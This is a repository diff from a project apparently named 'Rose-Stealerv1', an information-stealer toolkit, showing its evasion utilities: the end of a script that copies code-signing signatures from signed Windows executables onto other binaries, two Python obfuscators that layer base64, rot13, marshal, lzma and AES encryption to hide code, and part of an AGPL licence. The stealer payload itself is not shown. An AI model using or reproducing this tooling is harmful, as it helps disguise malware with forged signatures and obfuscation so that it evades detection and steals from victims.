flItms['MajorSubsystemVersion'] = struct.unpack('<H', binary.read(2))[0]
flItms['MinorSubsystemVersion'] = struct.unpack('<H', binary.read(2))[0]
flItms['Win32VersionValue'] = struct.unpack('<I', binary.read(4))[0]
flItms['SizeOfImageLoc'] = binary.tell()
flItms['SizeOfImage'] = struct.unpack('<I', binary.read(4))[0]
flItms['SizeOfHeaders'] = struct.unpack('<I', binary.read(4))[0]
flItms['CheckSum'] = struct.unpack('<I', binary.read(4))[0]
flItms['Subsystem'] = struct.unpack('<H', binary.read(2))[0]
flItms['DllCharacteristics'] = struct.unpack('<H', binary.read(2))[0]
if flItms['Magic'] == 0x20B:
flItms['SizeOfStackReserve'] = struct.unpack('<Q', binary.read(8))[0]
flItms['SizeOfStackCommit'] = struct.unpack('<Q', binary.read(8))[0]
flItms['SizeOfHeapReserve'] = struct.unpack('<Q', binary.read(8))[0]
flItms['SizeOfHeapCommit'] = struct.unpack('<Q', binary.read(8))[0]
else:
flItms['SizeOfStackReserve'] = struct.unpack('<I', binary.read(4))[0]
flItms['SizeOfStackCommit'] = struct.unpack('<I', binary.read(4))[0]
flItms['SizeOfHeapReserve'] = struct.unpack('<I', binary.read(4))[0]
flItms['SizeOfHeapCommit'] = struct.unpack('<I', binary.read(4))[0]
flItms['LoaderFlags'] = struct.unpack('<I', binary.read(4))[0] # zero
flItms['NumberofRvaAndSizes'] = struct.unpack('<I', binary.read(4))[0]
# End Windows-Specific Fields of Optional Header
# Begin Data Directories of Optional Header
flItms['ExportTableRVA'] = struct.unpack('<I', binary.read(4))[0]
flItms['ExportTableSize'] = struct.unpack('<I', binary.read(4))[0]
flItms['ImportTableLOCInPEOptHdrs'] = binary.tell()
#ImportTable SIZE|LOC
flItms['ImportTableRVA'] = struct.unpack('<I', binary.read(4))[0]
flItms['ImportTableSize'] = struct.unpack('<I', binary.read(4))[0]
flItms['ResourceTable'] = struct.unpack('<Q', binary.read(8))[0]
flItms['ExceptionTable'] = struct.unpack('<Q', binary.read(8))[0]
flItms['CertTableLOC'] = binary.tell()
flItms['CertLOC'] = struct.unpack("<I", binary.read(4))[0]
flItms['CertSize'] = struct.unpack("<I", binary.read(4))[0]
binary.close()
return flItms
def copyCert(exe):
flItms = gather_file_info_win(exe)
if flItms['CertLOC'] == 0 or flItms['CertSize'] == 0:
# not signed
# print("Input file Not signed!")
return None
with open(exe, 'rb') as f:
f.seek(flItms['CertLOC'], 0)
cert = f.read(flItms['CertSize'])
return cert
def writeCert(cert, exe, output):
flItms = gather_file_info_win(exe)
if not output:
output = output = str(exe) + "_signed"
shutil.copy2(exe, output)
# print("Output file: {0}".format(output))
with open(exe, 'rb') as g:
with open(output, 'wb') as f:
f.write(g.read())
f.seek(0)
f.seek(flItms['CertTableLOC'], 0)
f.write(struct.pack("<I", len(open(exe, 'rb').read())))
f.write(struct.pack("<I", len(cert)))
f.seek(0, io.SEEK_END)
f.write(cert)
# print("Signature appended. \nFIN.")
def outputCert(exe, output):
cert = copyCert(exe)
if cert:
if not output:
output = str(exe) + "_sig"
# print("Output file: {0}".format(output))
open(output, 'wb').write(cert)
# print("Signature ripped. \nFIN.")
def check_sig(exe):
flItms = gather_file_info_win(exe)
if flItms['CertLOC'] == 0 or flItms['CertSize'] == 0:
# not signed
# print("Inputfile Not signed!")
pass
else:
# print("Inputfile is signed!")
pass
def truncate(exe, output):
flItms = gather_file_info_win(exe)
if flItms['CertLOC'] == 0 or flItms['CertSize'] == 0:
# not signed
# print("Inputfile Not signed!")
sys.exit(-1)
else:
# print( "Inputfile is signed!")
pass
if not output:
output = str(exe) + "_nosig"
# print("Output file: {0}".format(output))
shutil.copy2(exe, output)
with open(output, "r+b") as binary:
# print('Overwriting certificate table pointer and truncating binary')
binary.seek(-flItms['CertSize'], io.SEEK_END)
binary.truncate()
binary.seek(flItms['CertTableLOC'], 0)
binary.write(b"\x00\x00\x00\x00\x00\x00\x00\x00")
# print("Signature removed. \nFIN.")
def signfile(exe, sigfile, output):
flItms = gather_file_info_win(exe)
cert = open(sigfile, 'rb').read()
if not output:
output = str(exe) + "_signed"
if os.path.abspath(exe) != os.path.abspath(output):
shutil.copy2(exe, output)
# print("Output file: {0}".format(output))
with open(exe, 'rb') as g:
data = g.read()
with open(output, 'wb') as f:
f.write(data)
f.seek(0)
f.seek(flItms['CertTableLOC'], 0)
f.write(struct.pack("<I", len(data)))
f.write(struct.pack("<I", len(cert)))
f.seek(0, io.SEEK_END)
f.write(cert)
# print("Signature appended. \nFIN.")
if __name__ == "__main__":
usage = 'usage: %prog [options]'
# print("\n\n!! New Version available now for Dev Tier Sponsors! Sponsor here: https://github.com/sponsors/secretsquirrel\n\n")
parser = OptionParser()
parser.add_option("-i", "--file", dest="inputfile",
help="input file", metavar="FILE")
parser.add_option('-r', '--rip', dest='ripsig', action='store_true',
help='rip signature off inputfile')
parser.add_option('-a', '--add', dest='addsig', action='store_true',
help='add signautre to targetfile')
parser.add_option('-o', '--output', dest='outputfile',
help='output file')
parser.add_option('-s', '--sig', dest='sigfile',
help='binary signature from disk')
parser.add_option('-t', '--target', dest='targetfile',
help='file to append signature to')
parser.add_option('-c', '--checksig', dest='checksig', action='store_true',
help='file to check if signed; does not verify signature')
parser.add_option('-T', '--truncate', dest="truncate", action='store_true',
help='truncate signature (i.e. remove sig)')
(options, args) = parser.parse_args()
# rip signature
# inputfile and rip to outputfile
if options.inputfile and options.ripsig:
# print("Ripping signature to file!")
outputCert(options.inputfile, options.outputfile)
sys.exit()
# copy from one to another
# inputfile and rip to targetfile to outputfile
if options.inputfile and options.targetfile:
cert = copyCert(options.inputfile)
writeCert(cert, options.targetfile, options.outputfile)
sys.exit()
# check signature
# inputfile
if options.inputfile and options.checksig:
check_sig(options.inputfile)
sys.exit()
# add sig to target file
if options.targetfile and options.sigfile:
signfile(options.targetfile, options.sigfile, options.outputfile)
sys.exit()
# truncate
if options.inputfile and options.truncate:
truncate(options.inputfile, options.outputfile)
sys.exit()
# parser.print_help()
parser.error("You must do something!")

144
Rose-Stealerv1/resources/utils/obfuscation/blankobf.py Normal file
View File

@@ -0,0 +1,144 @@
# If you want to use this in your project (with or without modifications, please give credits)
# https://github.com/Blank-c/BlankOBF
import random, string, base64, codecs, argparse, os, sys
from textwrap import wrap
from lzma import compress
from marshal import dumps
def printerr(data):
print(data, file= sys.stderr)
class BlankOBF:
def __init__(self, code, outputpath):
self.code = code.encode()
self.outpath = outputpath
self.varlen = 3
self.vars = {}
self.marshal()
self.encrypt1()
self.encrypt2()
self.encrypt3()
self.finalize()
def generate(self, name):
res = self.vars.get(name)
if res is None:
res = "_" + "".join(["_" for _ in range(self.varlen)])
self.varlen += 1
self.vars[name] = res
return res
def encryptstring(self, string, config= {}, func= False):
b64 = list(b"base64")
b64decode = list(b"b64decode")
__import__ = config.get("__import__", "__import__")
getattr = config.get("getattr", "getattr")
bytes = config.get("bytes", "bytes")
eval = config.get("eval", "eval")
if not func:
return f'{getattr}({__import__}({bytes}({b64}).decode()), {bytes}({b64decode}).decode())({bytes}({list(base64.b64encode(string.encode()))})).decode()'
else:
attrs = string.split(".")
base = self.encryptstring(attrs[0], config)
attrs = list(map(lambda x: self.encryptstring(x, config, False), attrs[1:]))
newattr = ""
for i, val in enumerate(attrs):
if i == 0:
newattr = f'{getattr}({eval}({base}), {val})'
else:
newattr = f'{getattr}({newattr}, {val})'
return newattr
def encryptor(self, config):
def func_(string, func= False):
return self.encryptstring(string, config, func)
return func_
def compress(self):
self.code = compress(self.code)
def marshal(self):
self.code = dumps(compile(self.code, "<string>", "exec"))
def encrypt1(self):
code = base64.b64encode(self.code).decode()
partlen = int(len(code)/4)
code = wrap(code, partlen)
var1 = self.generate("a")
var2 = self.generate("b")
var3 = self.generate("c")
var4 = self.generate("d")
init = [f'{var1}="{codecs.encode(code[0], "rot13")}"', f'{var2}="{code[1]}"', f'{var3}="{code[2][::-1]}"', f'{var4}="{code[3]}"']
random.shuffle(init)
init = ";".join(init)
self.code = f'''
# Obfuscated using https://github.com/Blank-c/BlankOBF
{init};__import__({self.encryptstring("builtins")}).exec(__import__({self.encryptstring("marshal")}).loads(__import__({self.encryptstring("base64")}).b64decode(__import__({self.encryptstring("codecs")}).decode({var1}, __import__({self.encryptstring("base64")}).b64decode("{base64.b64encode(b'rot13').decode()}").decode())+{var2}+{var3}[::-1]+{var4})))
'''.strip().encode()
def encrypt2(self):
self.compress()
var1 = self.generate("e")
var2 = self.generate("f")
var3 = self.generate("g")
var4 = self.generate("h")
var5 = self.generate("i")
var6 = self.generate("j")
var7 = self.generate("k")
var8 = self.generate("l")
var9 = self.generate("m")
conf = {
"getattr" : var4,
"eval" : var3,
"__import__" : var8,
"bytes" : var9
}
encryptstring = self.encryptor(conf)
self.code = f'''# Obfuscated using https://github.com/Blank-c/BlankOBF
{var3} = eval({self.encryptstring("eval")});{var4} = {var3}({self.encryptstring("getattr")});{var8} = {var3}({self.encryptstring("__import__")});{var9} = {var3}({self.encryptstring("bytes")});{var5} = lambda {var7}: {var3}({encryptstring("compile")})({var7}, {encryptstring("<string>")}, {encryptstring("exec")});{var1} = {self.code}
{var2} = {encryptstring('__import__("builtins").list', func= True)}({var1})
try:
{encryptstring('__import__("builtins").exec', func= True)}({var5}({encryptstring('__import__("lzma").decompress', func= True)}({var9}({var2})))) or {encryptstring('__import__("os")._exit', func= True)}(0)
except {encryptstring('__import__("lzma").LZMAError', func= True)}:...
'''.strip().encode()
def encrypt3(self):
self.compress()
data = base64.b64encode(self.code)
self.code = f'# Obfuscated using https://github.com/Blank-c/BlankOBF\n\nimport base64, lzma; exec(compile(lzma.decompress(base64.b64decode({data})), "<string>", "exec"))'.encode()
def finalize(self):
if os.path.dirname(self.outpath).strip() != "":
os.makedirs(os.path.dirname(self.outpath), exist_ok= True)
with open(self.outpath, "w") as e:
e.write(self.code.decode())
print("Saved as --> " + os.path.realpath(self.outpath))
if __name__ == "__main__":
parser = argparse.ArgumentParser(prog= sys.argv[0], description= "Obfuscates python program to make it harder to read")
parser.add_argument("FILE", help= "Path to the file containing the python code")
parser.add_argument("-o", type= str, help= 'Output file path [Default: "Obfuscated_<FILE>.py"]', dest= "path")
args = parser.parse_args()
if not os.path.isfile(sourcefile := args.FILE):
printerr(f'No such file: "{args.FILE}"')
os._exit(1)
elif not sourcefile.endswith((".py", ".pyw")):
printerr('The file does not have a valid python script extention!')
os._exit(1)
if args.path is None:
args.path = "Obfuscated_" + os.path.basename(sourcefile)
with open(sourcefile, encoding='utf-8') as sourcefile:
code = sourcefile.read()
BlankOBF(code, args.path)

207
Rose-Stealerv1/resources/utils/obfuscation/obf.py Normal file
View File

@@ -0,0 +1,207 @@
import ast
import random
import string
import os
import re
import argparse
import logging
import colorlog
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.primitives import padding
from cryptography.hazmat.backends import default_backend
from base64 import urlsafe_b64encode, urlsafe_b64decode
log_format = "%(asctime)s [%(levelname)s] [%(module)s.%(funcName)s] %(message)s"
handler = colorlog.StreamHandler()
handler.setFormatter(colorlog.ColoredFormatter(log_format))
handler.setLevel(logging.INFO)
file_handler = logging.FileHandler('rose-obf.log', encoding='utf-8')
file_handler.setLevel(logging.DEBUG)
file_formatter = logging.Formatter(log_format)
file_handler.setFormatter(file_formatter)
root_logger = logging.getLogger()
root_logger.addHandler(handler)
root_logger.addHandler(file_handler)
root_logger.setLevel(logging.DEBUG)
def generate_key(length=16):
characters = string.ascii_letters + string.punctuation
key = ''.join(random.choice(characters) for _ in range(length))
return key
def generate_random_string(length):
characters = string.ascii_uppercase + string.digits
return ''.join(random.choice(characters) for _ in range(length))
def getCustom():
choice = random.choice([1, 2, 3])
if choice == 1:
return generate_pattern1()
elif choice == 2:
return generate_pattern2()
elif choice == 3:
return generate_pattern3()
def generate_pattern1():
return "__" + ''.join(random.choice("O0") for _ in range(10))
def generate_pattern2():
return "__" + ''.join(random.choice("0123456789") for _ in range(10)) + "__"
def generate_pattern3():
return ''.join(random.choice("Il") for _ in range(15)) + 'I'
def encryptData(text, key):
cipher = Cipher(algorithms.AES(key), modes.ECB(), backend=default_backend())
encryptor = cipher.encryptor()
padder = padding.PKCS7(128).padder()
padded_data = padder.update(text.encode()) + padder.finalize()
ciphertext = encryptor.update(padded_data) + encryptor.finalize()
return urlsafe_b64encode(ciphertext).decode()
def decryptData(ciphertext, key):
cipher = Cipher(algorithms.AES(key), modes.ECB(), backend=default_backend())
decryptor = cipher.decryptor()
decrypted_data = decryptor.update(urlsafe_b64decode(ciphertext)) + decryptor.finalize()
unpadder = padding.PKCS7(128).unpadder()
unpadded_data = unpadder.update(decrypted_data) + unpadder.finalize()
return unpadded_data.decode()
def process_node(node, name_dict):
if isinstance(node, ast.Name) and node.id in name_dict:
node.id = name_dict[node.id]
def obfuscate_code(input_file, output_file):
with open(input_file, 'r', encoding='utf-8', errors='ignore') as f:
content = f.read()
content = re.sub(r'\n\s*\n', '\n', content)
tree = ast.parse(content)
name_dict = {}
root_logger.info('Renaming Classes, Functions, Arguments, Keyword Arguments and Variables...')
for node in ast.walk(tree):
if isinstance(node, (ast.FunctionDef, ast.AsyncFunctionDef)):
old_name = node.name
new_name = getCustom()
root_logger.debug(f'Function Name: {old_name} ---> New Function Name: {new_name}')
name_dict[old_name] = new_name
node.name = new_name
for arg in node.args.args:
old_arg_name = arg.arg
new_arg_name = getCustom()
root_logger.debug(f'Argument Name: {old_arg_name} ---> New Argument Name: {new_arg_name}')
name_dict[old_arg_name] = new_arg_name
arg.arg = new_arg_name
for keyword in node.args.kwonlyargs:
old_kwarg_name = keyword.arg
new_kwarg_name = getCustom()
root_logger.debug(f'Keyword Argument Name: {old_kwarg_name} ---> New Keyword Argument Name: {new_kwarg_name}')
name_dict[old_kwarg_name] = new_kwarg_name
keyword.arg = new_kwarg_name
elif isinstance(node, ast.ClassDef):
old_name = node.name
new_name = getCustom()
root_logger.debug(f'Class Name: {old_name} ---> New Class Name: {new_name}')
name_dict[old_name] = new_name
node.name = new_name
for node in ast.walk(tree):
if isinstance(node, ast.Assign):
for target in node.targets:
if isinstance(target, ast.Name):
old_var_name = target.id
new_var_name = getCustom()
root_logger.debug(f'Variable Name: {old_var_name} ---> New Variable Name: {new_var_name}')
name_dict[old_var_name] = new_var_name
target.id = new_var_name
process_node(node, name_dict)
root_logger.info('Renaming of classes, functions, arguments, keyword arguments and variables done.')
return ast.unparse(tree)
key = [ord(char) for char in generate_key()]
#key = getKey()
decryptionFun = getCustom()
ciphertextParam = getCustom()
keyVar = getCustom()
cipherVar = getCustom()
decryptorVar = getCustom()
decrypted_textVar = getCustom()
unpadderVar = getCustom()
unpadded_dataVar = getCustom()
def replace_string(match):
s = match.group(1)
encrypted_string = encryptData(s, bytes(key))
encrypted_string = encrypted_string.replace("'", r"\'")
chr_format = "+".join([f"chr({ord(char)})" for char in repr(encrypted_string)])
b_format = [ord(char) for char in chr_format]
decrypted_string = decryptData(encrypted_string, bytes(key))
root_logger.debug(f'String: {s} ---> Encrypted String: {encrypted_string} ---> Char Encrypted String: {chr_format} ---> Bytes Encrypted String: {b_format} ---> Aes Decrypted String: {decrypted_string}')
#return f'{decryptionFun}({repr(encrypted_string)})[1:-1]'
#randomizer = random.choice([f'{decryptionFun}(bytes({b_format}))[1:-1]', f'{decryptionFun}({chr_format})[1:-1]'])
#return randomizer
return f'{decryptionFun}({chr_format})[1:-1]'
#return f'{decryptionFun}(bytes({b_format}))'
def obfuscate_strings(content):
root_logger.info('Encrypting strings...')
data = re.sub(r'(\'[^\']*\'|\"[^\"]*\")', replace_string, content)
root_logger.info('Encryption of strings done.')
return data
def main(input_file, output_file):
root_logger.debug('Entered main function.')
content = obfuscate_code(input_file, output_file)
with open(output_file, 'w') as f:
f.write(''.join([
'from cryptography.hazmat.primitives.ciphers import Cipher,algorithms,modes\n',
'from cryptography.hazmat.primitives import padding\n',
'from cryptography.hazmat.backends import default_backend\n',
'from base64 import urlsafe_b64decode\n',
f'def {decryptionFun}({ciphertextParam}):\n',
f' {keyVar}=bytes({key})\n'
f' {cipherVar}=Cipher(algorithms.AES({keyVar}),modes.ECB(),backend=default_backend())\n',
f' {decryptorVar}={cipherVar}.decryptor()\n',
f' {decrypted_textVar}={decryptorVar}.update(urlsafe_b64decode({ciphertextParam}))+{decryptorVar}.finalize()\n',
#f' return {decrypted_textVar}.rstrip().decode()\n\n',
f' {unpadderVar} = padding.PKCS7(128).unpadder()\n',
f' {unpadded_dataVar} = {unpadderVar}.update({decrypted_textVar}) + {unpadderVar}.finalize()\n',
f' return {unpadded_dataVar}.decode()\n\n',
obfuscate_strings(content)
]))
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Obfuscate Python code efficiently with Rose-obf.')
parser.add_argument('-i', '--input', help='Input file name (required, .py)', dest='in_file', metavar='<input_file>', required=True)
parser.add_argument('-o', '--output', help='Output file name', dest='out_file', metavar='<output_file>', required=False)
args = parser.parse_args()
input_file = args.in_file
output_file = os.path.join(os.getcwd(), f"obf-{generate_random_string(10)}.py") if args.out_file is None else args.out_file
if input_file.endswith('.py'):
try:
root_logger.info(f'{input_file} ---> {output_file}...')
root_logger.debug('Entering main function.')
main(input_file, output_file)
root_logger.info(f'Done. {input_file} ---> {output_file}')
except Exception as e:
root_logger.error(f'Error: {e}')
else:
root_logger.error('Invalid Python file entered. Please make sure the file has a .py extension.')

661
Rose-Stealerv1/resources/utils/obfuscation/pycloak-main/LICENSE Normal file
View File

@@ -0,0 +1,661 @@
GNU AFFERO GENERAL PUBLIC LICENSE
Version 3, 19 November 2007
Copyright (C) 2007 Free Software Foundation, Inc. <https://fsf.org/>
Everyone is permitted to copy and distribute verbatim copies
of this license document, but changing it is not allowed.
Preamble
The GNU Affero General Public License is a free, copyleft license for
software and other kinds of works, specifically designed to ensure
cooperation with the community in the case of network server software.
The licenses for most software and other practical works are designed
to take away your freedom to share and change the works. By contrast,
our General Public Licenses are intended to guarantee your freedom to
share and change all versions of a program--to make sure it remains free
software for all its users.
When we speak of free software, we are referring to freedom, not
price. Our General Public Licenses are designed to make sure that you
have the freedom to distribute copies of free software (and charge for
them if you wish), that you receive source code or can get it if you
want it, that you can change the software or use pieces of it in new
free programs, and that you know you can do these things.
Developers that use our General Public Licenses protect your rights
with two steps: (1) assert copyright on the software, and (2) offer
you this License which gives you legal permission to copy, distribute
and/or modify the software.
A secondary benefit of defending all users' freedom is that
improvements made in alternate versions of the program, if they
receive widespread use, become available for other developers to
incorporate. Many developers of free software are heartened and
encouraged by the resulting cooperation. However, in the case of
software used on network servers, this result may fail to come about.
The GNU General Public License permits making a modified version and
letting the public access it on a server without ever releasing its
source code to the public.
The GNU Affero General Public License is designed specifically to
ensure that, in such cases, the modified source code becomes available
to the community. It requires the operator of a network server to
provide the source code of the modified version running there to the
users of that server. Therefore, public use of a modified version, on
a publicly accessible server, gives the public access to the source
code of the modified version.
An older license, called the Affero General Public License and
published by Affero, was designed to accomplish similar goals. This is
a different license, not a version of the Affero GPL, but Affero has
released a new version of the Affero GPL which permits relicensing under
this license.
The precise terms and conditions for copying, distribution and
modification follow.
TERMS AND CONDITIONS
0. Definitions.
"This License" refers to version 3 of the GNU Affero General Public License.
"Copyright" also means copyright-like laws that apply to other kinds of
works, such as semiconductor masks.
"The Program" refers to any copyrightable work licensed under this
License. Each licensee is addressed as "you". "Licensees" and
"recipients" may be individuals or organizations.
To "modify" a work means to copy from or adapt all or part of the work
in a fashion requiring copyright permission, other than the making of an
exact copy. The resulting work is called a "modified version" of the
earlier work or a work "based on" the earlier work.
A "covered work" means either the unmodified Program or a work based
on the Program.
To "propagate" a work means to do anything with it that, without
permission, would make you directly or secondarily liable for
infringement under applicable copyright law, except executing it on a
computer or modifying a private copy. Propagation includes copying,
distribution (with or without modification), making available to the
public, and in some countries other activities as well.
To "convey" a work means any kind of propagation that enables other
parties to make or receive copies. Mere interaction with a user through
a computer network, with no transfer of a copy, is not conveying.
An interactive user interface displays "Appropriate Legal Notices"
to the extent that it includes a convenient and prominently visible
feature that (1) displays an appropriate copyright notice, and (2)
tells the user that there is no warranty for the work (except to the
extent that warranties are provided), that licensees may convey the
work under this License, and how to view a copy of this License. If
the interface presents a list of user commands or options, such as a
menu, a prominent item in the list meets this criterion.
1. Source Code.
The "source code" for a work means the preferred form of the work
for making modifications to it. "Object code" means any non-source
form of a work.
A "Standard Interface" means an interface that either is an official
standard defined by a recognized standards body, or, in the case of
interfaces specified for a particular programming language, one that
is widely used among developers working in that language.
The "System Libraries" of an executable work include anything, other
than the work as a whole, that (a) is included in the normal form of
packaging a Major Component, but which is not part of that Major
Component, and (b) serves only to enable use of the work with that
Major Component, or to implement a Standard Interface for which an
implementation is available to the public in source code form. A
"Major Component", in this context, means a major essential component
(kernel, window system, and so on) of the specific operating system
(if any) on which the executable work runs, or a compiler used to
produce the work, or an object code interpreter used to run it.
The "Corresponding Source" for a work in object code form means all
the source code needed to generate, install, and (for an executable
work) run the object code and to modify the work, including scripts to
control those activities. However, it does not include the work's
System Libraries, or general-purpose tools or generally available free
programs which are used unmodified in performing those activities but
which are not part of the work. For example, Corresponding Source
includes interface definition files associated with source files for
the work, and the source code for shared libraries and dynamically
linked subprograms that the work is specifically designed to require,
such as by intimate data communication or control flow between those
subprograms and other parts of the work.
The Corresponding Source need not include anything that users
can regenerate automatically from other parts of the Corresponding
Source.
The Corresponding Source for a work in source code form is that
same work.
2. Basic Permissions.
All rights granted under this License are granted for the term of
copyright on the Program, and are irrevocable provided the stated
conditions are met. This License explicitly affirms your unlimited
permission to run the unmodified Program. The output from running a
covered work is covered by this License only if the output, given its
content, constitutes a covered work. This License acknowledges your
rights of fair use or other equivalent, as provided by copyright law.
You may make, run and propagate covered works that you do not
convey, without conditions so long as your license otherwise remains
in force. You may convey covered works to others for the sole purpose
of having them make modifications exclusively for you, or provide you
with facilities for running those works, provided that you comply with
the terms of this License in conveying all material for which you do
not control copyright. Those thus making or running the covered works
for you must do so exclusively on your behalf, under your direction
and control, on terms that prohibit them from making any copies of
your copyrighted material outside their relationship with you.
Conveying under any other circumstances is permitted solely under
the conditions stated below. Sublicensing is not allowed; section 10
makes it unnecessary.
3. Protecting Users' Legal Rights From Anti-Circumvention Law.
No covered work shall be deemed part of an effective technological
measure under any applicable law fulfilling obligations under article
11 of the WIPO copyright treaty adopted on 20 December 1996, or
similar laws prohibiting or restricting circumvention of such
measures.
When you convey a covered work, you waive any legal power to forbid
circumvention of technological measures to the extent such circumvention
is effected by exercising rights under this License with respect to
the covered work, and you disclaim any intention to limit operation or
modification of the work as a means of enforcing, against the work's
users, your or third parties' legal rights to forbid circumvention of
technological measures.
4. Conveying Verbatim Copies.
You may convey verbatim copies of the Program's source code as you
receive it, in any medium, provided that you conspicuously and
appropriately publish on each copy an appropriate copyright notice;
keep intact all notices stating that this License and any
non-permissive terms added in accord with section 7 apply to the code;
keep intact all notices of the absence of any warranty; and give all
recipients a copy of this License along with the Program.
You may charge any price or no price for each copy that you convey,
and you may offer support or warranty protection for a fee.
5. Conveying Modified Source Versions.
You may convey a work based on the Program, or the modifications to
produce it from the Program, in the form of source code under the
terms of section 4, provided that you also meet all of these conditions:
a) The work must carry prominent notices stating that you modified
it, and giving a relevant date.
b) The work must carry prominent notices stating that it is
released under this License and any conditions added under section
7. This requirement modifies the requirement in section 4 to
"keep intact all notices".
c) You must license the entire work, as a whole, under this
License to anyone who comes into possession of a copy. This
License will therefore apply, along with any applicable section 7
additional terms, to the whole of the work, and all its parts,
regardless of how they are packaged. This License gives no
permission to license the work in any other way, but it does not
invalidate such permission if you have separately received it.
d) If the work has interactive user interfaces, each must display
Appropriate Legal Notices; however, if the Program has interactive
interfaces that do not display Appropriate Legal Notices, your
work need not make them do so.
A compilation of a covered work with other separate and independent
works, which are not by their nature extensions of the covered work,
and which are not combined with it such as to form a larger program,
in or on a volume of a storage or distribution medium, is called an
"aggregate" if the compilation and its resulting copyright are not
used to limit the access or legal rights of the compilation's users
beyond what the individual works permit. Inclusion of a covered work
in an aggregate does not cause this License to apply to the other
parts of the aggregate.
6. Conveying Non-Source Forms.
You may convey a covered work in object code form under the terms
of sections 4 and 5, provided that you also convey the
machine-readable Corresponding Source under the terms of this License,
in one of these ways:
a) Convey the object code in, or embodied in, a physical product
(including a physical distribution medium), accompanied by the
Corresponding Source fixed on a durable physical medium
customarily used for software interchange.
b) Convey the object code in, or embodied in, a physical product
(including a physical distribution medium), accompanied by a
written offer, valid for at least three years and valid for as
long as you offer spare parts or customer support for that product
model, to give anyone who possesses the object code either (1) a
copy of the Corresponding Source for all the software in the
product that is covered by this License, on a durable physical
medium customarily used for software interchange, for a price no
more than your reasonable cost of physically performing this
conveying of source, or (2) access to copy the
Corresponding Source from a network server at no charge.
c) Convey individual copies of the object code with a copy of the
written offer to provide the Corresponding Source. This
alternative is allowed only occasionally and noncommercially, and
only if you received the object code with such an offer, in accord
with subsection 6b.
d) Convey the object code by offering access from a designated
place (gratis or for a charge), and offer equivalent access to the
Corresponding Source in the same way through the same place at no
further charge. You need not require recipients to copy the
Corresponding Source along with the object code. If the place to
copy the object code is a network server, the Corresponding Source
may be on a different server (operated by you or a third party)
that supports equivalent copying facilities, provided you maintain
clear directions next to the object code saying where to find the
Corresponding Source. Regardless of what server hosts the
Corresponding Source, you remain obligated to ensure that it is
available for as long as needed to satisfy these requirements.
e) Convey the object code using peer-to-peer transmission, provided
you inform other peers where the object code and Corresponding
Source of the work are being offered to the general public at no
charge under subsection 6d.
A separable portion of the object code, whose source code is excluded
from the Corresponding Source as a System Library, need not be
included in conveying the object code work.
A "User Product" is either (1) a "consumer product", which means any
tangible personal property which is normally used for personal, family,
or household purposes, or (2) anything designed or sold for incorporation
into a dwelling. In determining whether a product is a consumer product,
doubtful cases shall be resolved in favor of coverage. For a particular
product received by a particular user, "normally used" refers to a
typical or common use of that class of product, regardless of the status
of the particular user or of the way in which the particular user
actually uses, or expects or is expected to use, the product. A product
is a consumer product regardless of whether the product has substantial
commercial, industrial or non-consumer uses, unless such uses represent
the only significant mode of use of the product.
"Installation Information" for a User Product means any methods,
procedures, authorization keys, or other information required to install
and execute modified versions of a covered work in that User Product from
a modified version of its Corresponding Source. The information must
suffice to ensure that the continued functioning of the modified object
code is in no case prevented or interfered with solely because
modification has been made.
If you convey an object code work under this section in, or with, or
specifically for use in, a User Product, and the conveying occurs as
part of a transaction in which the right of possession and use of the
User Product is transferred to the recipient in perpetuity or for a
fixed term (regardless of how the transaction is characterized), the
Corresponding Source conveyed under this section must be accompanied
by the Installation Information. But this requirement does not apply
if neither you nor any third party retains the ability to install
modified object code on the User Product (for example, the work has
been installed in ROM).
The requirement to provide Installation Information does not include a
requirement to continue to provide support service, warranty, or updates
for a work that has been modified or installed by the recipient, or for
the User Product in which it has been modified or installed. Access to a
network may be denied when the modification itself materially and
adversely affects the operation of the network or violates the rules and
protocols for communication across the network.
Corresponding Source conveyed, and Installation Information provided,
in accord with this section must be in a format that is publicly
documented (and with an implementation available to the public in
source code form), and must require no special password or key for
unpacking, reading or copying.
7. Additional Terms.
"Additional permissions" are terms that supplement the terms of this
License by making exceptions from one or more of its conditions.
Additional permissions that are applicable to the entire Program shall
be treated as though they were included in this License, to the extent
that they are valid under applicable law. If additional permissions
apply only to part of the Program, that part may be used separately
under those permissions, but the entire Program remains governed by
this License without regard to the additional permissions.
When you convey a copy of a covered work, you may at your option
remove any additional permissions from that copy, or from any part of
it. (Additional permissions may be written to require their own
removal in certain cases when you modify the work.) You may place
additional permissions on material, added by you to a covered work,
for which you have or can give appropriate copyright permission.
Notwithstanding any other provision of this License, for material you
add to a covered work, you may (if authorized by the copyright holders of
that material) supplement the terms of this License with terms:
a) Disclaiming warranty or limiting liability differently from the
terms of sections 15 and 16 of this License; or
b) Requiring preservation of specified reasonable legal notices or
author attributions in that material or in the Appropriate Legal
Notices displayed by works containing it; or
c) Prohibiting misrepresentation of the origin of that material, or
requiring that modified versions of such material be marked in
reasonable ways as different from the original version; or
d) Limiting the use for publicity purposes of names of licensors or
authors of the material; or
e) Declining to grant rights under trademark law for use of some
trade names, trademarks, or service marks; or
f) Requiring indemnification of licensors and authors of that
material by anyone who conveys the material (or modified versions of
it) with contractual assumptions of liability to the recipient, for
any liability that these contractual assumptions directly impose on
those licensors and authors.
All other non-permissive additional terms are considered "further
restrictions" within the meaning of section 10. If the Program as you
received it, or any part of it, contains a notice stating that it is
governed by this License along with a term that is a further
restriction, you may remove that term. If a license document contains
a further restriction but permits relicensing or conveying under this
License, you may add to a covered work material governed by the terms
of that license document, provided that the further restriction does
not survive such relicensing or conveying.
If you add terms to a covered work in accord with this section, you
must place, in the relevant source files, a statement of the
additional terms that apply to those files, or a notice indicating
where to find the applicable terms.
Additional terms, permissive or non-permissive, may be stated in the
form of a separately written license, or stated as exceptions;
the above requirements apply either way.
8. Termination.
You may not propagate or modify a covered work except as expressly
provided under this License. Any attempt otherwise to propagate or
modify it is void, and will automatically terminate your rights under
this License (including any patent licenses granted under the third
paragraph of section 11).
However, if you cease all violation of this License, then your
license from a particular copyright holder is reinstated (a)
provisionally, unless and until the copyright holder explicitly and
finally terminates your license, and (b) permanently, if the copyright
holder fails to notify you of the violation by some reasonable means
prior to 60 days after the cessation.
Moreover, your license from a particular copyright holder is
reinstated permanently if the copyright holder notifies you of the
violation by some reasonable means, this is the first time you have
received notice of violation of this License (for any work) from that
copyright holder, and you cure the violation prior to 30 days after
your receipt of the notice.
Termination of your rights under this section does not terminate the
licenses of parties who have received copies or rights from you under
this License. If your rights have been terminated and not permanently
reinstated, you do not qualify to receive new licenses for the same
material under section 10.
9. Acceptance Not Required for Having Copies.
